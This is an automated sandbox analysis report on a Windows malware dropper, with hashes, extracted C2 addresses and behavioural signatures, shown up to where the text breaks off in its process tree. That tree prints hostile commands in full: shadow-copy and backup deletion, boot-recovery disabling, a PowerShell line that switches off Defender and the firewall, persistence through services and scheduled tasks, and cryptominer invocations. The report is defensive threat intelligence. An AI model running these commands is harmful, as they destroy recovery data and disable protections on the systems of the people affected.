Analysis

  • max time kernel
    142s
  • max time network
    157s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    20-09-2021 14:10

General

  • Target

    28ea220f0c8f906c66e1ab5657ca0260.exe

  • Size

    269KB

  • MD5

    28ea220f0c8f906c66e1ab5657ca0260

  • SHA1

    04d158591858f17abd9295f481c26ae7ef771e37

  • SHA256

    71bbaf19229855f0bfdebbe93d12b5f5fac6c0b542b5ca3b5a00d4b088ccdadc

  • SHA512

    aba54593ad2344b0c40e8942f1b4099c639eb443ec2a31c98813243bcc7f03fb192a879be7748d1681db889673e5e1e5d257d8256112359363daa0eacd945cb0

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://venerynnet1.top/

http://kevonahira2.top/

http://vegangelist3.top/

http://kingriffaele4.top/

http://arakeishant5.top/

rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

installEXE

C2

146.70.35.170:30905

Extracted

Family

redline

Botnet

installbv

C2

80.85.137.89:17954

Extracted

Family

redline

Botnet

2k superstar

C2

91.142.77.155:5469

Extracted

Family

redline

Botnet

Moneymaker

C2

185.244.217.166:56316

Signatures

  • MedusaLocker

    Ransomware with several variants first seen in September 2019.

  • MedusaLocker Payload 1 IoCs
  • Modifies WinLogon for persistence 2 TTPs 27 IoCs
  • Modifies security service 2 TTPs 1 IoCs
  • Process spawned unexpected child process 27 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 11 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Windows security bypass 2 TTPs
  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • XMRig Miner Payload 2 IoCs
  • Creates new service(s) 1 TTPs
  • Deletes System State backups 3 TTPs 2 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Downloads MZ/PE file
  • Executes dropped EXE 51 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Modifies extensions of user files 30 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Sets service image path in registry 2 TTPs
  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Deletes itself 1 IoCs
  • Drops startup file 1 IoCs
  • Loads dropped DLL 27 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 4 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 56 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Enumerates connected drives 3 TTPs 41 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Drops file in System32 directory 64 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 30 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 29 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Interacts with shadow copies 2 TTPs 13 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies data under HKEY_USERS 20 IoCs
  • Modifies registry class 6 IoCs
  • Modifies system certificate store 2 TTPs 8 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 11 IoCs
  • Suspicious use of SendNotifyMessage 25 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\28ea220f0c8f906c66e1ab5657ca0260.exe
    "C:\Users\Admin\AppData\Local\Temp\28ea220f0c8f906c66e1ab5657ca0260.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:940
    • C:\Users\Admin\AppData\Local\Temp\28ea220f0c8f906c66e1ab5657ca0260.exe
      "C:\Users\Admin\AppData\Local\Temp\28ea220f0c8f906c66e1ab5657ca0260.exe"
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:364
  • C:\Users\Admin\AppData\Local\Temp\FF25.exe
    C:\Users\Admin\AppData\Local\Temp\FF25.exe
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:1964
    • C:\Users\Admin\AppData\Local\Temp\FF25.exe
      C:\Users\Admin\AppData\Local\Temp\FF25.exe
      2⤵
      • Executes dropped EXE
      • Checks SCSI registry key(s)
      • Suspicious behavior: MapViewOfSection
      PID:1972
  • C:\Users\Admin\AppData\Local\Temp\6A5.exe
    C:\Users\Admin\AppData\Local\Temp\6A5.exe
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:1996
    • C:\Users\Admin\AppData\Local\Temp\6A5.exe
      C:\Users\Admin\AppData\Local\Temp\6A5.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:1148
  • C:\Users\Admin\AppData\Local\Temp\1269.exe
    C:\Users\Admin\AppData\Local\Temp\1269.exe
    1⤵
    • Executes dropped EXE
    • Checks BIOS information in registry
    • Checks whether UAC is enabled
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of AdjustPrivilegeToken
    PID:1856
  • C:\Users\Admin\AppData\Local\Temp\6FE4.exe
    C:\Users\Admin\AppData\Local\Temp\6FE4.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    PID:1960
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\hnyckaqw\
      2⤵
        PID:412
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\mrnfdgs.exe" C:\Windows\SysWOW64\hnyckaqw\
        2⤵
          PID:468
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create hnyckaqw binPath= "C:\Windows\SysWOW64\hnyckaqw\mrnfdgs.exe /d\"C:\Users\Admin\AppData\Local\Temp\6FE4.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
            PID:1664
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\System32\sc.exe" description hnyckaqw "wifi internet conection"
            2⤵
              PID:1640
            • C:\Windows\SysWOW64\sc.exe
              "C:\Windows\System32\sc.exe" start hnyckaqw
              2⤵
                PID:2016
              • C:\Windows\SysWOW64\netsh.exe
                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                2⤵
                  PID:1648
              • C:\Users\Admin\AppData\Local\Temp\81A1.exe
                C:\Users\Admin\AppData\Local\Temp\81A1.exe
                1⤵
                • Executes dropped EXE
                • Checks BIOS information in registry
                • Checks whether UAC is enabled
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious use of AdjustPrivilegeToken
                PID:1604
              • C:\Windows\SysWOW64\hnyckaqw\mrnfdgs.exe
                C:\Windows\SysWOW64\hnyckaqw\mrnfdgs.exe /d"C:\Users\Admin\AppData\Local\Temp\6FE4.exe"
                1⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                PID:1452
                • C:\Windows\SysWOW64\svchost.exe
                  svchost.exe
                  2⤵
                  • Drops file in System32 directory
                  • Suspicious use of SetThreadContext
                  • Modifies data under HKEY_USERS
                  PID:1264
                  • C:\Windows\SysWOW64\svchost.exe
                    svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
                    3⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1776
              • C:\Users\Admin\AppData\Local\Temp\9522.exe
                C:\Users\Admin\AppData\Local\Temp\9522.exe
                1⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Modifies system certificate store
                PID:868
                • C:\Windows\SysWOW64\cmd.exe
                  cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\9522.exe"
                  2⤵
                    PID:2368
                    • C:\Windows\SysWOW64\timeout.exe
                      timeout /T 10 /NOBREAK
                      3⤵
                      • Delays execution with timeout.exe
                      PID:2884
                • C:\Users\Admin\AppData\Local\Temp\A8A3.exe
                  C:\Users\Admin\AppData\Local\Temp\A8A3.exe
                  1⤵
                  • Executes dropped EXE
                  PID:980
                • C:\Users\Admin\AppData\Local\Temp\C6BE.exe
                  C:\Users\Admin\AppData\Local\Temp\C6BE.exe
                  1⤵
                  • Executes dropped EXE
                  • Modifies extensions of user files
                  • Adds Run key to start application
                  • Drops desktop.ini file(s)
                  • Enumerates connected drives
                  • Drops file in System32 directory
                  • Drops file in Program Files directory
                  • Drops file in Windows directory
                  • System policy modification
                  PID:2032
                  • C:\Windows\system32\vssadmin.exe
                    vssadmin.exe Resize ShadowStorage /for=c: /on=c: /maxsize=401MB
                    2⤵
                    • Interacts with shadow copies
                    PID:1008
                  • C:\Windows\system32\vssadmin.exe
                    vssadmin.exe Resize ShadowStorage /for=c: /on=c: /maxsize=unbounded
                    2⤵
                    • Interacts with shadow copies
                    PID:1676
                  • C:\Windows\system32\vssadmin.exe
                    vssadmin.exe Resize ShadowStorage /for=d: /on=d: /maxsize=401MB
                    2⤵
                    • Enumerates connected drives
                    • Interacts with shadow copies
                    PID:1656
                  • C:\Windows\system32\vssadmin.exe
                    vssadmin.exe Resize ShadowStorage /for=d: /on=d: /maxsize=unbounded
                    2⤵
                    • Enumerates connected drives
                    • Interacts with shadow copies
                    PID:208
                  • C:\Windows\system32\vssadmin.exe
                    vssadmin.exe Resize ShadowStorage /for=e: /on=e: /maxsize=401MB
                    2⤵
                    • Enumerates connected drives
                    • Interacts with shadow copies
                    PID:1988
                  • C:\Windows\system32\vssadmin.exe
                    vssadmin.exe Resize ShadowStorage /for=e: /on=e: /maxsize=unbounded
                    2⤵
                    • Enumerates connected drives
                    • Interacts with shadow copies
                    PID:216
                  • C:\Windows\system32\vssadmin.exe
                    vssadmin.exe Resize ShadowStorage /for=f: /on=f: /maxsize=401MB
                    2⤵
                    • Enumerates connected drives
                    • Interacts with shadow copies
                    PID:204
                  • C:\Windows\system32\vssadmin.exe
                    vssadmin.exe Resize ShadowStorage /for=f: /on=f: /maxsize=unbounded
                    2⤵
                    • Enumerates connected drives
                    • Interacts with shadow copies
                    PID:1676
                  • C:\Windows\system32\vssadmin.exe
                    vssadmin.exe Resize ShadowStorage /for=g: /on=g: /maxsize=401MB
                    2⤵
                    • Enumerates connected drives
                    • Interacts with shadow copies
                    PID:224
                  • C:\Windows\system32\vssadmin.exe
                    vssadmin.exe Resize ShadowStorage /for=g: /on=g: /maxsize=unbounded
                    2⤵
                    • Enumerates connected drives
                    • Interacts with shadow copies
                    PID:236
                  • C:\Windows\system32\vssadmin.exe
                    vssadmin.exe Resize ShadowStorage /for=h: /on=h: /maxsize=401MB
                    2⤵
                    • Enumerates connected drives
                    • Interacts with shadow copies
                    PID:208
                  • C:\Windows\system32\vssadmin.exe
                    vssadmin.exe Resize ShadowStorage /for=h: /on=h: /maxsize=unbounded
                    2⤵
                    • Enumerates connected drives
                    • Interacts with shadow copies
                    PID:2068
                  • C:\Windows\system32\vssadmin.exe
                    vssadmin.exe Delete Shadows /All /Quiet
                    2⤵
                    • Interacts with shadow copies
                    PID:2420
                  • C:\Windows\system32\bcdedit.exe
                    bcdedit.exe /set {default} recoveryenabled No
                    2⤵
                    • Modifies boot configuration data using bcdedit
                    PID:2508
                  • C:\Windows\system32\bcdedit.exe
                    bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
                    2⤵
                    • Modifies boot configuration data using bcdedit
                    PID:2604
                  • C:\Windows\system32\wbadmin.exe
                    wbadmin DELETE SYSTEMSTATEBACKUP
                    2⤵
                    • Deletes System State backups
                    • Drops file in Windows directory
                    PID:2676
                  • C:\Windows\system32\wbadmin.exe
                    wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
                    2⤵
                    • Deletes System State backups
                    • Drops file in Windows directory
                    PID:2788
                  • C:\Windows\System32\Wbem\wmic.exe
                    wmic.exe SHADOWCOPY /nointeractive
                    2⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2860
                • C:\Users\Admin\AppData\Local\Temp\CD73.exe
                  C:\Users\Admin\AppData\Local\Temp\CD73.exe
                  1⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of SetThreadContext
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1768
                  • C:\ProgramData\ZZZZZ.exe
                    "C:\ProgramData\ZZZZZ.exe"
                    2⤵
                    • Executes dropped EXE
                    PID:2056
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c start C:\Users\Admin\AppData\Roaming\DriverRealtekHDmaster.exe
                      3⤵
                      • Loads dropped DLL
                      PID:2100
                      • C:\Users\Admin\AppData\Roaming\DriverRealtekHDmaster.exe
                        C:\Users\Admin\AppData\Roaming\DriverRealtekHDmaster.exe
                        4⤵
                        • Modifies WinLogon for persistence
                        • Executes dropped EXE
                        • Adds Run key to start application
                        • Drops file in System32 directory
                        • Drops file in Windows directory
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2160
                        • C:\Users\Admin\AppData\Roaming\DriverRealtekHDmaster.exe
                          "C:\Users\Admin\AppData\Roaming\DriverRealtekHDmaster.exe"
                          5⤵
                          • Modifies WinLogon for persistence
                          • Executes dropped EXE
                          • Adds Run key to start application
                          • Drops file in System32 directory
                          • Drops file in Windows directory
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2192
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\kOOy6uMWav.bat"
                            6⤵
                              PID:2788
                              • C:\Windows\system32\chcp.com
                                chcp 65001
                                7⤵
                                  PID:2916
                                • C:\Windows\system32\w32tm.exe
                                  w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                  7⤵
                                    PID:2908
                                  • C:\Users\Admin\AppData\Roaming\DriverRealtekHDmaster.exe
                                    "C:\Users\Admin\AppData\Roaming\DriverRealtekHDmaster.exe"
                                    7⤵
                                      PID:2248
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\riqMdvj24s.bat"
                                        8⤵
                                          PID:2764
                                          • C:\Windows\system32\chcp.com
                                            chcp 65001
                                            9⤵
                                              PID:944
                                            • C:\Windows\system32\w32tm.exe
                                              w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                              9⤵
                                                PID:2828
                                              • C:\Recovery\34107922-98a6-11eb-a15f-ea91f6580701\sppsvc.exe
                                                "C:\Recovery\34107922-98a6-11eb-a15f-ea91f6580701\sppsvc.exe"
                                                9⤵
                                                • Executes dropped EXE
                                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2584
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /c start C:\Users\Admin\AppData\Local\Temp\DriverMaster.exe
                                    3⤵
                                    • Loads dropped DLL
                                    PID:2128
                                    • C:\Users\Admin\AppData\Local\Temp\DriverMaster.exe
                                      C:\Users\Admin\AppData\Local\Temp\DriverMaster.exe
                                      4⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2184
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "EngineDriverMaster" /tr '"C:\Users\Admin\AppData\Local\Temp\EngineDriverMaster.exe"' & exit
                                        5⤵
                                          PID:2772
                                          • C:\Windows\system32\schtasks.exe
                                            schtasks /create /f /sc onlogon /rl highest /tn "EngineDriverMaster" /tr '"C:\Users\Admin\AppData\Local\Temp\EngineDriverMaster.exe"'
                                            6⤵
                                            • Creates scheduled task(s)
                                            PID:2836
                                        • C:\Users\Admin\AppData\Local\Temp\EngineDriverMaster.exe
                                          "C:\Users\Admin\AppData\Local\Temp\EngineDriverMaster.exe"
                                          5⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2116
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "EngineDriverMaster" /tr '"C:\Users\Admin\AppData\Local\Temp\EngineDriverMaster.exe"' & exit
                                            6⤵
                                              PID:2536
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks /create /f /sc onlogon /rl highest /tn "EngineDriverMaster" /tr '"C:\Users\Admin\AppData\Local\Temp\EngineDriverMaster.exe"'
                                                7⤵
                                                • Creates scheduled task(s)
                                                PID:2020
                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
                                              "C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"
                                              6⤵
                                              • Executes dropped EXE
                                              PID:1652
                                    • C:\Users\Admin\AppData\Local\Temp\CD73.exe
                                      "C:\Users\Admin\AppData\Local\Temp\CD73.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2280
                                  • C:\Windows\system32\vssvc.exe
                                    C:\Windows\system32\vssvc.exe
                                    1⤵
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:1740
                                  • C:\Users\Admin\AppData\Local\Temp\D486.exe
                                    C:\Users\Admin\AppData\Local\Temp\D486.exe
                                    1⤵
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                    • Suspicious use of SetThreadContext
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:1624
                                    • C:\Users\Admin\AppData\Local\Temp\D486.exe
                                      "C:\Users\Admin\AppData\Local\Temp\D486.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2484
                                      • C:\Users\Admin\AppData\Local\Temp\chlen.exe
                                        "C:\Users\Admin\AppData\Local\Temp\chlen.exe"
                                        3⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                        • Suspicious use of SetThreadContext
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1500
                                        • C:\Users\Admin\AppData\Local\Temp\chlen.exe
                                          "C:\Users\Admin\AppData\Local\Temp\chlen.exe"
                                          4⤵
                                          • Executes dropped EXE
                                          PID:1492
                                      • C:\Users\Admin\AppData\Local\Temp\Zena.exe
                                        "C:\Users\Admin\AppData\Local\Temp\Zena.exe"
                                        3⤵
                                        • Executes dropped EXE
                                        • Drops startup file
                                        • Loads dropped DLL
                                        • Modifies system certificate store
                                        PID:2544
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty –Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System –Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(exit)
                                          4⤵
                                          • Modifies security service
                                          • Loads dropped DLL
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2348
                                          • C:\ProgramData\UpSys.exe
                                            "C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
                                            5⤵
                                            • Executes dropped EXE
                                            PID:2708
                                            • C:\ProgramData\UpSys.exe
                                              "C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
                                              6⤵
                                              • Executes dropped EXE
                                              PID:1876
                                              • C:\ProgramData\UpSys.exe
                                                "C:\ProgramData\UpSys.exe" /TI/ /SW:0 powershell.exe
                                                7⤵
                                                • Modifies WinLogon for persistence
                                                • Executes dropped EXE
                                                • Adds Run key to start application
                                                • Drops file in System32 directory
                                                • Drops file in Program Files directory
                                                • Drops file in Windows directory
                                                • Modifies data under HKEY_USERS
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2248
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
                                                  8⤵
                                                  • Modifies data under HKEY_USERS
                                                  PID:3040
                                          • C:\Windows\system32\netsh.exe
                                            "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
                                            5⤵
                                              PID:2896
                                          • C:\ProgramData\Systemd\Moneylogs1.exe
                                            -epool eu1.ethermine.org:4444 -ewal 0xd988388A10BEe45505917886eB7d2d1ff6ccA80a -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -coin eth
                                            4⤵
                                            • Executes dropped EXE
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            PID:2516
                                          • C:\ProgramData\Systemd\Moneylogs1.exe
                                            -epool eu1.ethermine.org:4444 -ewal 0xd988388A10BEe45505917886eB7d2d1ff6ccA80a -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -coin eth
                                            4⤵
                                            • Executes dropped EXE
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            PID:2812
                                          • C:\ProgramData\Systemd\Moneylogs1.exe
                                            -epool eu1.ethermine.org:4444 -ewal 0xd988388A10BEe45505917886eB7d2d1ff6ccA80a -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -coin eth
                                            4⤵
                                            • Executes dropped EXE
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            PID:520
                                          • C:\ProgramData\Systemd\Moneylogs1.exe
                                            -epool eu1.ethermine.org:4444 -ewal 0xd988388A10BEe45505917886eB7d2d1ff6ccA80a -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -coin eth
                                            4⤵
                                            • Executes dropped EXE
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            PID:860
                                          • C:\ProgramData\Systemd\Moneylogs1.exe
                                            -epool eu1.ethermine.org:4444 -ewal 0xd988388A10BEe45505917886eB7d2d1ff6ccA80a -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -coin eth
                                            4⤵
                                            • Executes dropped EXE
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            PID:2328
                                          • C:\ProgramData\Systemd\Moneylogs1.exe
                                            -epool eu1.ethermine.org:4444 -ewal 0xd988388A10BEe45505917886eB7d2d1ff6ccA80a -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -coin eth
                                            4⤵
                                            • Executes dropped EXE
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            PID:1800
                                          • C:\ProgramData\Systemd\Moneylogs1.exe
                                            -epool eu1.ethermine.org:4444 -ewal 0xd988388A10BEe45505917886eB7d2d1ff6ccA80a -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -coin eth
                                            4⤵
                                            • Executes dropped EXE
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            PID:2276
                                          • C:\ProgramData\Systemd\Moneylogs1.exe
                                            -epool eu1.ethermine.org:4444 -ewal 0xd988388A10BEe45505917886eB7d2d1ff6ccA80a -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -coin eth
                                            4⤵
                                            • Executes dropped EXE
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            PID:2080
                                          • C:\ProgramData\Systemd\Moneylogs1.exe
                                            -epool eu1.ethermine.org:4444 -ewal 0xd988388A10BEe45505917886eB7d2d1ff6ccA80a -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -coin eth
                                            4⤵
                                            • Executes dropped EXE
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            PID:2768
                                          • C:\ProgramData\Systemd\Moneylogs1.exe
                                            -epool eu1.ethermine.org:4444 -ewal 0xd988388A10BEe45505917886eB7d2d1ff6ccA80a -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -coin eth
                                            4⤵
                                            • Executes dropped EXE
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            PID:2372
                                          • C:\ProgramData\Systemd\Moneylogs1.exe
                                            -epool eu1.ethermine.org:4444 -ewal 0xd988388A10BEe45505917886eB7d2d1ff6ccA80a -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -coin eth
                                            4⤵
                                            • Executes dropped EXE
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            PID:2456
                                          • C:\ProgramData\Systemd\Moneylogs1.exe
                                            -epool eu1.ethermine.org:4444 -ewal 0xd988388A10BEe45505917886eB7d2d1ff6ccA80a -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -coin eth
                                            4⤵
                                            • Executes dropped EXE
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            PID:2292
                                          • C:\ProgramData\Systemd\Moneylogs1.exe
                                            -epool eu1.ethermine.org:4444 -ewal 0xd988388A10BEe45505917886eB7d2d1ff6ccA80a -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -coin eth
                                            4⤵
                                            • Executes dropped EXE
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            PID:2668
                                          • C:\ProgramData\Systemd\Moneylogs1.exe
                                            -epool eu1.ethermine.org:4444 -ewal 0xd988388A10BEe45505917886eB7d2d1ff6ccA80a -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -coin eth
                                            4⤵
                                            • Executes dropped EXE
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            PID:2716
                                          • C:\ProgramData\Systemd\Moneylogs1.exe
                                            -epool eu1.ethermine.org:4444 -ewal 0xd988388A10BEe45505917886eB7d2d1ff6ccA80a -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -coin eth
                                            4⤵
                                            • Executes dropped EXE
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            PID:2732
                                          • C:\ProgramData\Systemd\Moneylogs1.exe
                                            -epool eu1.ethermine.org:4444 -ewal 0xd988388A10BEe45505917886eB7d2d1ff6ccA80a -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -coin eth
                                            4⤵
                                            • Executes dropped EXE
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            PID:2864
                                          • C:\ProgramData\Systemd\Moneylogs1.exe
                                            -epool eu1.ethermine.org:4444 -ewal 0xd988388A10BEe45505917886eB7d2d1ff6ccA80a -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -coin eth
                                            4⤵
                                            • Executes dropped EXE
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            PID:3008
                                          • C:\ProgramData\Systemd\Moneylogs1.exe
